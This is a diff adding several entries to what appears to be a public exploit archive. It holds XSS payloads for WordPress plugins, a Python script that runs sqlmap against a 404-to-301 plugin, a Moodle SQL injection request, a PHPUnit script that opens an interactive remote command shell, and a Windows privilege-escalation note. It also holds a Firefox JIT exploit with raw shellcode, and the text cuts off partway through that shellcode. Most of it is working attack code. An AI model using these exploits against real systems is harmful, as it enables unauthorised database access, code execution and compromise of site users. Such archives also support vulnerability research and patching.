+Domain Check is a Wordpress plugin that allows you to see what domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.
+
+An authenticated user is able to inject arbitrary Javascript or HTML code to the "Domain Check Profile" interface available in settings page of the plugin, due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the administrators. The plugin versions prior to 1.0.16 are affected by this vulnerability.
+
+
+The details of the discovery are given below.
+
+
+# Steps To Reproduce:
+1. Just visit the following page after signing in the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script>
+2. The XSS will be triggered on the settings page.
\ No newline at end of file
diff --git a/exploits/php/webapps/50698.py b/exploits/php/webapps/50698.py
new file mode 100755
index 000000000..803b5bf42
--- /dev/null
+++ b/exploits/php/webapps/50698.py
@@ -0,0 +1,112 @@
+# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
+# Date 30.01.2022
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/
+# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip
+# Version: <= 2.0.2
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2015-9323
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md
+
+'''
+Description:
+The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.
+'''
+
+banner = '''
+
+ .o88b. db    db d88888b        .d888b.  .d88b.   db   ooooo        .d888b. d8888b. .d888b. d8888b.
+d8P  Y8 88    88 88'            VP  `8D .8P  88. o88  8P~~~~        88' `8D VP  `8D VP  `8D VP  `8D
+8P      Y8    8P 88ooooo           odD' 88  d'88  88 dP             `V8o88'   oooY'    odD'   oooY'
+8b      `8b  d8' 88~~~~~ C8888D  .88'   88 d' 88  88 V8888b. C8888D    d8'    ~~~b.  .88'     ~~~b.
+Y8b  d8  `8bd8'  88.            j88.    `88  d8'  88     `8D          d8'   db   8D j88.    db   8D
+ `Y88P'    YP    Y88888P        888888D  `Y88P'   VP 88oobY'         d8'    Y8888P' 888888D Y8888P'
+
+                                                            [+] 404 to 301 - SQL-Injection
+                                                            [@] Developed by Ron Jost (Hacker5preme)
+
+'''
+print(banner)
+
+import argparse
+import os
+import requests
+from datetime import datetime
+import json
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+
+
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+
+# SQL-Injection (Exploit):
+
+# Generate payload for sqlmap
+print ('[+] Payload for sqlmap exploitation:')
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+cookie = cookie.replace(',', '; ')
+
+exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
+exploit_risk = ' --level 2 --risk 2'
+exploit_cookie = r' --cookie="' + cookie + r'" '
+
+print('    Sqlmap options:')
+print('     -a, --all           Retrieve everything')
+print('     -b, --banner        Retrieve DBMS banner')
+print('     --current-user      Retrieve DBMS current user')
+print('     --current-db        Retrieve DBMS current database')
+print('     --passwords         Enumerate DBMS users password hashes')
+print('     --tables            Enumerate DBMS database tables')
+print('     --columns           Enumerate DBMS database table column')
+print('     --schema            Enumerate DBMS schema')
+print('     --dump              Dump DBMS database table entries')
+print('     --dump-all          Dump all DBMS databases tables entries')
+retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
+exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'
+os.system(exploit_code)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
\ No newline at end of file
diff --git a/exploits/php/webapps/50699.txt b/exploits/php/webapps/50699.txt
new file mode 100644
index 000000000..cc854eab4
--- /dev/null
+++ b/exploits/php/webapps/50699.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PHP Restaurants 1.0 - SQLi (Unauthenticated)
+# Google Dork: None
+# Date: 01/29/2022
+# Exploit Author: Nefrit ID
+# Vendor Homepage: https://github.com/jcwebhole
+# Software Link: https://github.com/jcwebhole/php_restaurants
+# Version: 1.0
+# Tested on: Kali Linux & Windows 10
+
+*SQL injection is a code injection technique used to attack
+data-driven applications, in which malicious SQL statements are
+inserted into an entry field for execution (e.g. to dump the database
+contents to the attacker). wikipedia*
+
+
+===Start===
+Exploit Url = http://localhost/php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
+AND (SELECT 3952 FROM (SELECT(SLEEP(5)))XMSid)
+
+Burpsuite Proxy Intercept
+GET /php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
+HTTP/1.1
+Host: web_server_ip
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69
+Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://web_server_ip/php_restaurants-master/admin/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: uid=1
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/50700.txt b/exploits/php/webapps/50700.txt
new file mode 100644
index 000000000..82751af76
--- /dev/null
+++ b/exploits/php/webapps/50700.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Moodle 3.11.4  - SQL Injection
+# Date: 30/01/2022
+# Exploit Author: lavclash75
+# Vendor Homepage: https://moodle.org/
+# Version: Moodle 3.11 to 3.11.4
+# CVE: CVE-2022-0332
+# POC
+
+```
+GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
+Host: local.numanturle.com
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+
+```
+
+```
+
+```
+
+![PHP](img/orderby.jpg?raw=true "PHP")
+![PHP](img/uri.jpg?raw=true "PHP")
+![PHP](img/sqlmap.jpg?raw=true "PHP")
+
+# Reference
+ * [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
+ * [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)
\ No newline at end of file
diff --git a/exploits/php/webapps/50702.py b/exploits/php/webapps/50702.py
new file mode 100755
index 000000000..6e40e0c6d
--- /dev/null
+++ b/exploits/php/webapps/50702.py
@@ -0,0 +1,54 @@
+# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 2022/01/30
+# Exploit Author: souzo
+# Vendor Homepage: phpunit.de
+# Version: 4.8.28
+# Tested on: Unit
+# CVE : CVE-2017-9841
+
+import requests
+from sys import argv
+phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
+
+def check_vuln(site):
+    vuln = False
+    try:
+        for i in phpfiles:
+            site = site+i
+            req = requests.get(site,headers= {
+                "Content-Type" : "text/html",
+                "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
+            },data="<?php echo md5(phpunit_rce); ?>")
+            if "6dd70f16549456495373a337e6708865" in req.text:
+                print(f"Vulnerable: {site}")
+                return site
+    except:
+        return vuln
+def help():
+    exit(f"{argv[0]} <site>")
+
+def main():
+    if len(argv) < 2:
+        help()
+    if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:
+        help()
+    site = argv[1]
+    if site.endswith("/"):
+        site = list(site)
+        site[len(site) -1 ] = ''
+        site = ''.join(site)
+
+    pathvuln = check_vuln(site)
+    if pathvuln == False:
+        exit("Not vuln")
+    try:
+        while True:
+            cmd = input("> ")
+            req = requests.get(str(pathvuln),headers={
+                "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
+                "Content-Type" : "text/html"
+            },data=f'<?php system(\'{cmd}\') ?>')
+            print(req.text)
+    except Exception as ex:
+        exit("Error: " + str(ex))
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50703.txt b/exploits/php/webapps/50703.txt
new file mode 100644
index 000000000..cf634ca2f
--- /dev/null
+++ b/exploits/php/webapps/50703.txt
@@ -0,0 +1,21 @@
+# Exploit Title: WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
+# Date: 2/28/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/contact-fo...ck-tester/
+# Version: 1.0.2
+# Tested on: Windows 10
+# CVE: CVE-2021-24247
+
+1. Description:
+The plugin settings are visible to all registered users in the dashboard.
+A registered user can leave a payload in the plugin settings.
+
+2. Proof of Concept:
+- Register an account
+- Navigate to the dashboard
+- Go to CF7 Check Tester -> Settings
+- Add a form
+- Add a field to the form
+- Put in a payload in either Field selector or Field value  "><script>alert(1)</script>
+- Save
+Anyone who visits the settings page will execute the payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/50704.txt b/exploits/php/webapps/50704.txt
new file mode 100644
index 000000000..4a6f53ec3
--- /dev/null
+++ b/exploits/php/webapps/50704.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
+# Date: 3/16/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/
+# Version: 1.13.21
+# Tested on: Windows 10
+# CVE: CVE-2021-24300
+
+1. Description:
+This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//
\ No newline at end of file
diff --git a/exploits/php/webapps/50705.txt b/exploits/php/webapps/50705.txt
new file mode 100644
index 000000000..10e8e8490
--- /dev/null
+++ b/exploits/php/webapps/50705.txt
@@ -0,0 +1,14 @@
+# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
+# Date: 3/16/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/post-grid/
+# Version: 2.1.1
+# Tested on: Windows 10
+# CVE: CVE-2021-24488
+
+1. Description:
+This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
+wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//
\ No newline at end of file
diff --git a/exploits/php/webapps/50706.txt b/exploits/php/webapps/50706.txt
new file mode 100644
index 000000000..578f819c9
--- /dev/null
+++ b/exploits/php/webapps/50706.txt
@@ -0,0 +1,76 @@
+# Exploit Title: WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
+# Date: 08-01-2022
+# Exploit Author: Ceylan Bozogullarindan
+# Author Webpage: https://bozogullarindan.com
+# Vendor Homepage: https://thimpress.com/
+# Software Link: https://thimpress.com/learnpress-plugin/
+# Version: 4.1.4.1
+# Tested on: Linux
+# CVE: CVE-2022-0377 (https://wpscan.com/vulnerability/0d95ada6-53e3-4a80-a395-eacd7b090f26)
+
+
+# Description:
+
+LearnPress is a WordPress complete solution for creating a Learning Management System (LMS). It can help you to create courses, lessons and quizzes.
+
+A user of this LMS can upload an image as a profile avatar after the registration.  After this process the user crops and saves the image. Then a "POST" request that contains user supplied name of the image is sent to the server for renaming and cropping of the image. As a result of this request, the name of the user-supplied image is changed with a MD5 value. This process can be conducted only when type of the image is JPG or PNG.
+
+An attacker can use this vulnerability in order to rename an arbitrary image file. By doing this, he/she can destroy the design of the web site. Some examples of the malicious actions:
+
+- Destroying of banner of a web site
+- Destroying of user avatars
+- Destroying of post images
+- Destroying of button/app images etc.
+
+# Steps To Reproduce
+
+1. Register and login to the learnpress system.
+2. Go to the profile page and upload an avatar image: https://<learnpress-website>/lp-profile/<your-username>/settings/avatar/
+3. While saving the image, intercept the POST request by a local proxy tool such as Burpsuite.
+4. Change the value of the `lp-user-avatar-crop[name]` parameter to an arbitrary image file path that is in the website (example, /2021/01/image.png or /../../image.png). The path is relative to "/wp-content/uploads/".
+5. Forward the intercepted request and check the existence of the image file given in Step 4.
+6. You will see that the image can not be found. Because the name of it is renamed.
+
+# PoC - Supported Materials
+
+Request
+---------------------------------------------------------------------------
+POST /lp-profile/<username>/settings/avatar/?lp-ajax=save-uploaded-user-avatar HTTP/1.1
+Host: 127.0.0.1:8000
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 242
+Origin: http://127.0.0.1:8000
+Connection: close
+Referer: http://127.0.0.1:8000/lp-profile/ceylanb/settings/avatar/
+Cookie: _learn_press_session_4411def9d576984c8d78253236b2a62f=4509d5151308952d51776226bb847241%7C%7C1641770556%7C%7C19e385a78349f37ac993a36ecda9c41f; wordpress_lp_cart=1; wordpress_logged_in_4411def9d576984c8d78253236b2a62f=ceylanb%7C1642807471%7CRKS5hU3q1b2G0xY1pkwfl43yVJdIqz9fqBLcknvbyzJ%7C98d337987ee0cbc7539a742e2ebbfbe107d1e0c910c3efd9daa51c4775236e19; LP=%7B%22course-tab%22%3A%22overview%22%7D
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+DNT: 1
+Sec-GPC: 1
+
+lp-user-avatar-crop%5Bname%5D=%2f..%2f..%2fimage.jpg&lp-user-avatar-crop%5Bwidth%5D=250&lp-user-avatar-crop%5Bheight%5D=250&lp-user-avatar-crop%5Bpoints%5D=0%2C0%2C300%2C300&lp-user-avatar-crop%5Bnonce%5D=8bdc969b07&lp-user-avatar-custom=yes
+---------------------------------------------------------------------------
+
+Response
+---------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sat, 08 Jan 2022 00:30:11 GMT
+Server: Apache/2.4.48 (Debian)
+X-Powered-By: PHP/7.4.23
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+Link: <http://127.0.0.1:8000/wp-json/>; rel="https://api.w.org/"
+Link: <http://127.0.0.1:8000/wp-json/wp/v2/pages/17>; rel="alternate"; type="application/json"
+Link: <http://127.0.0.1:8000/?p=17>; rel=shortlink
+Vary: Accept-Encoding
+Content-Length: 191
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<-- LP_AJAX_START -->{"success":true,"avatar":"<img src=\"http:\/\/127.0.0.1:8000\/wp-content\/uploads\/learn-press-profile\/2\/f574f3e6594498507333c41af9426d43.jpg\" \/>"}<-- LP_AJAX_END -->
+---------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/windows/local/50690.txt b/exploits/windows/local/50690.txt
new file mode 100644
index 000000000..ea81f5388
--- /dev/null
+++ b/exploits/windows/local/50690.txt
@@ -0,0 +1,38 @@
+# Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path
+# Discovery by: Angel Canseco
+# Discovery Date: 2022-01-16
+# Software Link: https://www.contpaqi.com/descargas
+# Tested Version: 14.0.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 pro x64 english
+# Step to discover Unquoted Service Path:
+
+
+C:\Users\test>wmic service get name, displayname, pathname, startmode |
+findstr /i "Auto" | findstr /i "AppKeyLicenseServer_CONTPAQi"
+
+Servidor de Licencias CONTPAQir    AppKeyLicenseServer_CONTPAQi
+C:\Program Files (x86)\Compac\Servidor de
+Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe        Auto
+
+C:\Users\test>sc qc "AppKeyLicenseServer_CONTPAQi"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AppKeyLicenseServer_CONTPAQi
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Compac\Servidor de
+Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Servidor de Licencias CONTPAQi®
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would cause the local user to be able to insert their
+code in the system root path undetected by the OS or other security
+applications and elevate his privileges after reboot.
\ No newline at end of file
diff --git a/exploits/windows/local/50691.txt b/exploits/windows/local/50691.txt
new file mode 100644
index 000000000..7d1e49787
--- /dev/null
+++ b/exploits/windows/local/50691.txt
@@ -0,0 +1,741 @@
+# Exploit Title: Mozilla Firefox 67 - Array.pop JIT Type Confusion
+# Date: 2021-12-07
+# Type: RCE
+# Platform: Windows
+# Exploit Author: deadlock (Forrest Orr)
+# Author Homepage: https://forrest-orr.net
+# Vendor Homepage: https://www.mozilla.org/en-US/
+# Software Link: https://ftp.mozilla.org/pub/firefox/releases/65.0.1/win64/en-US/
+# Version: Firefox 67.0.2 64-bit and earlier
+# Tested on: Windows 10 x64
+# CVE: CVE-2019-11707
+# Bypasses: DEP, High Entropy ASLR, CFG
+# Full Hydseven exploit chain with sandbox escape (CVE-2019-11708): https://github.com/forrest-orr/Exploits/tree/main/Chains/Hydseven
+
+<html>
+<head>
+</head>
+<body>
+<script>
+/*
+  _______ ___ ___ _______        _______ _______ _____ _______        _____ _____ _______ _______ _______
+ |   _   |   Y   |   _   |______|       |   _   | _   |   _   |______| _   | _   |   _   |   _   |   _   |
+ |.  1___|.  |   |.  1___|______|___|   |.  |   |.|   |   |   |______|.|   |.|   |___|   |.  |   |___|   |
+ |.  |___|.  |   |.  __)_        /  ___/|.  |   `-|.  |\___   |      `-|.  `-|.  |  /   /|.  |   |  /   /
+ |:  1   |:  1   |:  1   |      |:  1  \|:  1   | |:  |:  1   |        |:  | |:  | |   | |:  1   | |   |
+ |::.. . |\:.. ./|::.. . |      |::.. . |::.. . | |::.|::.. . |        |::.| |::.| |   | |::.. . | |   |
+ `-------' `---' `-------'      `-------`-------' `---`-------'        `---' `---' `---' `-------' `---'
+
+Overview
+
+This is a Windows variation of CVE-2019-11707, an exploit targetting a type
+confusion bug in the Array.pop method during inlining/IonMonkey JIT compilation
+of affected code in versions of Firefox up to 67.0.2.
+
+Fundamentally this bug allows an attacker to trick IonMonkey into JIT'ing a
+function popping and accessing an element of a specially crafted malicious
+array without generating any speculative guards on the element type. In other
+words, we can reliably produce an ASM routine for a JS function which is only
+designed to handle array element access for a specific object type, while
+allowing us to effectively modify the type of the element being accessed. Thus
+a class object may be accessed as a float, a float as an integer, and so on.
+The end result is a classic type confusion on the ASM layer which is leveraged
+into an OOB array access, providing the basis for construction of R/W/AddressOf
+primitives.
+
+More specifically this bug allows for the creation of specially crafted malicious
+arrays with a specific element type set. By creating a function which loops
+through this malicious array and calls Array.pop on its elements, IonMonkey
+can be made to JIT an ASM routine specifically optimized to only handle this
+one specific type of array element. The bug comes into affect in the unique
+edge case of an object prototype: when Array.pop attempts to access an element
+at an index which does not exist (such as in a sparse array) it will then make
+a secondary, fall-back attempt to access this element index on the prototype
+of its associated array. This would not be an issue if IonMonkey tracked
+modifications to the type sets of prototype elements but it does not.
+
+...
+
+bool hasIndexedProperty;
+MOZ_TRY_VAR(hasIndexedProperty, ArrayPrototypeHasIndexedProperty(this, script()));
+if (hasIndexedProperty) {
+    trackOptimizationOutcome(TrackedOutcome::ProtoIndexedProps);
+    return InliningStatus_NotInlined;
+    }
+
+...
+
+This was the vulnerable piece of code in IonMonkey which enabled the bug. It
+can be plainly seen that they did attempt to check types of indexed elements
+on array prototypes but did so incorrectly: every array will by default have a
+special ArrayPrototype object associated with it. However, we do not need to
+leave this default layout intact. We can set a custom prototype on our
+malicious array (this custom prototype itself being an array) and trick the
+engine into checking the ArrayPrototype of our custom prototype for indexed
+elements instead of the custom prototype which contains the malicious untracked
+elements. Practically speaking:
+
+var SparseTrapdoorArray = [BugArrayUint32, BugArrayUint32];
+
+This will produce:
+
+SparseTrapdoorArray -> ArrayPrototype
+
+Now if a new array is created and set as the custom prototype of
+SparseTrapdoorArray:
+
+var CustomPrototype = [new Uint8Array(BugArrayBuf)];
+SparseTrapdoorArray.__proto__ = CustomPrototype;
+
+This will produce:
+
+SparseTrapdoorArray -> CustomPrototype -> ArrayPrototype
+
+Thus an element access on a non-existent element of SparseTrapdoorArray will
+access this same index on CustomPrototype instead, and it will be the
+ArrayPrototype of CustomPrototype which is checked by IonMonkey during
+inlining, not the actual prototype of the SparseTrapdoorArray array ie. the
+CustomPrototype. If SparseTrapdoorArray[0] were to not exist and be accessed,
+it would result in an access to the Uint8Array element at CustomPrototype[0]
+despite the JIT'd function being optimized for access to Uint32Array at
+SparseTrapdoorArray[0].
+
+~
+
+Design
+
+I created the exploit primitives for CVE-2019-11707 in much the same way as I
+did CVE-2019-17026: the heap is groomed so that 3 objects are lined up
+in memory. In this case they are ArrayBuffers.
+
+[ArrayBuffer 1][ArrayBuffer 2][ArrayBuffer 3]
+
+We use the bug to overflow array 1 and corrupt the ArrayBuffer of array 2,
+artificially augmenting its length to encompass the NativeObject of array 3.
+From this point onward, array 2 is used to corrupt the slots pointer within the
+NativeObject of array 3 to do arbitrary reads, writes and addrof.
+
+Once these primitives are obtained, a JIT spray is used to plant an egg hunter
+shellcode in +RX memory within the firefox.exe content process being hijacked.
+The ASM source for my egg hunter can be found here:
+https://github.com/forrest-orr/Exploits/blob/main/Payloads/Source/DoubleStar/Stage1_EggHunter/Egghunter64.asm
+
+The role of this egg hunter is to search out a magic QWORD in memory prefixing
+an arbitrary shellcode (in this case a WinExec shellcode) stored as a
+Uint8Array somewhere in this content process, disable DEP on it, and execute
+it via a branch instruction.
+
+The JIT code pointer of the JIT sprayed function is identified by using the
+arbitrary read/addrof primitives to walk its JitInfo struct, and then a
+secondary egg hunter within the JS itself is used to scan this JIT'd region for
+the JIT sprayed egg hunter shellcode itself, stored as a double float array and
+implanted at the end of the JIT'd ASM. Once this array is found, the JIT code
+pointer is modified to point to it, and the JIT sprayed function is run one
+last time, resulting in the WinExec shellcode being found in memory, set to
+executable and executed.
+
+~
+
+Sandboxing
+
+The lineage of the Firefox application involves a Medium Integrity AppContainer
+firefox.exe "parent" process which is responsible for making network
+connections and handling the UI, with a set of Low Integrity child/content
+firefox.exe processes beneath it, each locked to a specific domain (in the past
+it was one process per tab, now its one process per site) and responsible for
+parsing and potentially compiling/executing Javascript.
+
+The exploit in this source file is only able to compromise the child/content
+process. These processes are heavily sandboxed, and are not able to make network
+connections, perform (almost) any file I/O, launch processes, or affect the UI.
+This means that by default, neither WinExec or MessageBox shellcodes will work
+in this exploit.
+
+For an example of how the child/content process sandbox may be escaped via a
+secondary exploit, see either my Hydseven or Double Star exploit chains:
+https://github.com/forrest-orr/Exploits/tree/main/Chains/Hydseven
+https://github.com/forrest-orr/DoubleStar
+
+In the case of this standalone exploit, in order to be able to see the affect
+of a successful payload execution post-exploitation, you must adjust the
+security.sandbox.content.level in the "about:config" down from 5 to atleast 2.
+
+~
+
+Credits
+
+0vercl0k  - for the original research/analysis of CVE-2019-11708 and reverse
+            engineering of xul.dll for "god mode" patching.
+
+sherl0ck  - for his writeup on CVE-2019-11707.
+
+*/
+
+////////
+////////
+// Global helpers/settings
+////////
+
+const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 